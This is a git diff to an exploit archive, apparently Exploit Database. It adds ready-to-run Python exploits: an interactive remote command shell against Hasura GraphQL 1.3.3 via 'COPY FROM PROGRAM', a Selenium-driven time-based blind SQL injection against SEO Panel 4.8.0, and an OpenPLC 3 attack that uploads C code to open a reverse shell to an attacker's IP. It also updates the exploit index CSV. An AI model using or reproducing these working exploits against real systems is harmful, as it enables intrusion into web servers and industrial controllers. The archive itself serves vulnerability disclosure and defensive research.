diff --git a/exploits/hardware/webapps/49775.html b/exploits/hardware/webapps/49775.html index ce3832d4d..4622e00ee 100644 --- a/exploits/hardware/webapps/49775.html +++ b/exploits/hardware/webapps/49775.html @@ -4,7 +4,7 @@ # Version: Firmware V02.03.01.45_pt # CVE: 2021-31152 -# Exploit code: +# Exploit Code:
@@ -14,9 +14,8 @@
- - + \ No newline at end of file diff --git a/exploits/multiple/webapps/49802.py b/exploits/multiple/webapps/49802.py new file mode 100755 index 000000000..8449939e6 --- /dev/null +++ b/exploits/multiple/webapps/49802.py @@ -0,0 +1,41 @@ +# Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution +# Software: Hasura GraphQL +# Software Link: https://github.com/hasura/graphql-engine +# Version: 1.3.3 +# Exploit Author: Dolev Farhi +# Date: 4/23/2021 +# Tested on: Ubuntu + +import requests +import sys + +HASURA_SCHEME = 'http' +HASURA_HOST = '192.34.57.144' +HASURA_PORT = 80 + +print('Start typing shell commands...') + +while True: + cmd = input('cmd $> ') + data = { "type":"bulk", + "args":[ + { + "type":"run_sql", + "args":{ + "sql":"SET LOCAL statement_timeout = 10000;","cascade":False,"read_only":False} + }, + { + "type":"run_sql", + "args":{ + "sql":"DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM '" + cmd + "';\nSELECT * FROM cmd_exec;","cascade":False,"read_only":False} + } + ] + } + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + if r.ok: + try: + for i in r.json()[1]['result']: + print(''.join(i)) + except: + print(r.json()) \ No newline at end of file diff --git a/exploits/php/webapps/49642.txt b/exploits/php/webapps/49642.txt index 8264bcba8..1b2b9d016 100644 --- a/exploits/php/webapps/49642.txt +++ b/exploits/php/webapps/49642.txt @@ -5,7 +5,7 @@ # Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 # Version: 8.8.53370 # Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14 - +# CVE: CVE-2021-26830 # Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d Step 1 - Login to the zenario cms with admin credentials. diff --git a/exploits/php/webapps/49666.txt b/exploits/php/webapps/49666.txt index f0db91ef8..c09f918d5 100644 --- a/exploits/php/webapps/49666.txt +++ b/exploits/php/webapps/49666.txt @@ -1,4 +1,4 @@ -# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection +# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1) # Date: 17/02/2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ diff --git a/exploits/php/webapps/49804.py b/exploits/php/webapps/49804.py new file mode 100755 index 000000000..b2cff60c4 --- /dev/null +++ b/exploits/php/webapps/49804.py @@ -0,0 +1,59 @@ +# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2) +# Author: nu11secur1ty +# Testing and Debugging: nu11secur1ty +# Date: 04/25/2021 +# Vendor: https://www.seopanel.org/ +# Link: https://www.seopanel.org/spdownload/4.8.0 +# CVE: CVE-2021-28419 + +[+] Exploit Source: + +#!/usr/bin/python3 +# Author: @nu11secur1ty +# CVE-2021-28419 + +from selenium import webdriver +import time + + +#enter the link to the website you want to automate login. +website_link="http://192.168.1.3/seopanel/login.php" + +#enter your login username +username="spadmin" + +#enter your login password +password="spadmin" + +#enter the element for username input field +element_for_username="userName" + +#enter the element for password input field +element_for_password="password" + +#enter the element for submit button +element_for_submit="login" + + +browser = webdriver.Chrome() +browser.get((website_link)) + +try: +username_element = browser.find_element_by_name(element_for_username) +username_element.send_keys(username) +password_element = browser.find_element_by_name(element_for_password) +password_element.send_keys(password) +signInButton = browser.find_element_by_name(element_for_submit) +signInButton.click() + +# Exploit +browser.get((" +http://192.168.1.3/seopanel/archive.php?from_time=2021-04-25&order_col=(SELECT +7397 FROM +(SELECT(SLEEP(15)))nu11secur1ty)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id=1")) + +print("payload is deployed MySQL is not responding correctly...\n") + +except Exception: +#### This exception occurs if the element are not found in the webpage. +print("Some error occured :(") \ No newline at end of file diff --git a/exploits/python/webapps/49803.py b/exploits/python/webapps/49803.py new file mode 100755 index 000000000..a91032e48 --- /dev/null +++ b/exploits/python/webapps/49803.py @@ -0,0 +1,109 @@ +# Exploit Title: OpenPLC 3 - Remote Code Execution (Authenticated) +# Date: 25/04/2021 +# Exploit Author: Fellipe Oliveira +# Vendor Homepage: https://www.openplcproject.com/ +# Software Link: https://github.com/thiagoralves/OpenPLC_v3 +# Version: OpenPLC v3 +# Tested on: Ubuntu 16.04,Debian 9,Debian 10 Buster + +#/usr/bin/python3 + +import requests +import sys +import time +import optparse +import re + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") +parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") +parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") +parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") +parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") + +options, args = parser.parse_args() +if not options.url: + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + print('[+] Specify an url target') + print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") + exit() + +host = options.url +login = options.url + '/login' +upload_program = options.url + '/programs' +compile_program = options.url + '/compile-program?file=681871.st' +run_plc_server = options.url + '/start_plc' +user = options.user +password = options.passw +rev_ip = options.rip +rev_port = options.rport +x = requests.Session() + +def auth(): + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + time.sleep(1) + print('[+] Checking if host '+host+' is Up...') + host_up = x.get(host) + try: + if host_up.status_code == 200: + print('[+] Host Up! ...') + except: + print('[+] This host seems to be down :( ') + sys.exit(0) + + print('[+] Trying to authenticate with credentials '+user+':'+password+'') + time.sleep(1) + submit = { + 'username': user, + 'password': password + } + x.post(login, data=submit) + response = x.get(upload_program) + + if len(response.text) > 30000 and response.status_code == 200: + print('[+] Login success!') + time.sleep(1) + else: + print('[x] Login failed :(') + sys.exit(0) + +def injection(): + print('[+] PLC program uploading... ') + upload_url = host + "/upload-program" + upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} + upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} + upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" + upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) + + act_url = host + "/upload-program-action" + act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} + act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" + upload_act = x.post(act_url, headers=act_headers, data=act_data) + time.sleep(2) + +def connection(): + print('[+] Attempt to Code injection...') + inject_url = host + "/hardware" + inject_dash = host + "/dashboard" + inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} + inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------289530314119386812901408558722", "Origin": host, "Connection": "close", "Referer": host + "/hardware", "Upgrade-Insecure-Requests": "1"} + inject_data = "-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"hardware_layer\"\r\n\r\nblank_linux\r\n-----------------------------289530314119386812901408558722\r\nContent-Disposition: form-data; name=\"custom_layer_code\"\r\n\r\n#include \"ladder.h\"\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n" + inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data) + time.sleep(3) + comp = x.get(compile_program) + time.sleep(6) + x.get(inject_dash) + time.sleep(3) + print('[+] Spawning Reverse Shell...') + start = x.get(run_plc_server) + time.sleep(1) + if start.status_code == 200: + print('[+] Reverse connection receveid!') + sys.exit(0) + else: + print('[+] Failed to receive connection :(') + sys.exit(0) + +auth() +injection() +connection() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0b130fd70..99976167e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43881,7 +43881,7 @@ id,file,description,date,author,type,platform,port 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php, 49659,exploits/multiple/webapps/49659.html,"VestaCP 0.9.8 - File Upload CSRF",2021-03-17,"Fady Mohammed Osman",webapps,multiple, 49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple, -49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php, +49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)",2021-03-18,"Piyush Patil",webapps,php, 49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php, 49668,exploits/multiple/webapps/49668.txt,"Plone CMS 5.2.3 - 'Title' Stored XSS",2021-03-19,"Piyush Patil",webapps,multiple, 49669,exploits/php/webapps/49669.txt,"LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS",2021-03-19,"Clément Cruchet",webapps,php, @@ -43952,6 +43952,7 @@ id,file,description,date,author,type,platform,port 49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple, 49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE",2021-04-16,boku,webapps,php, 49775,exploits/hardware/webapps/49775.html,"Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access)",2021-04-21,"Rodolfo Mariano",webapps,hardware, +49802,exploits/multiple/webapps/49802.py,"Hasura GraphQL 1.3.3 - Remote Code Execution",2021-04-26,"Dolev Farhi",webapps,multiple, 49777,exploits/php/webapps/49777.txt,"Fast PHP Chat 1.3 - 'my_item_search' SQL Injection",2021-04-21,"Fatih Coskun",webapps,php, 49778,exploits/php/webapps/49778.txt,"WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS)",2021-04-21,"Himamshu Dilip Kulkarni",webapps,php, 49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-04-21,"Ömer Hasan Durmuş",webapps,php, @@ -43973,3 +43974,5 @@ id,file,description,date,author,type,platform,port 49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-23,nu11secur1ty,webapps,multiple, 49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware, 49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware, +49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python, +49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",2021-04-26,nu11secur1ty,webapps,php,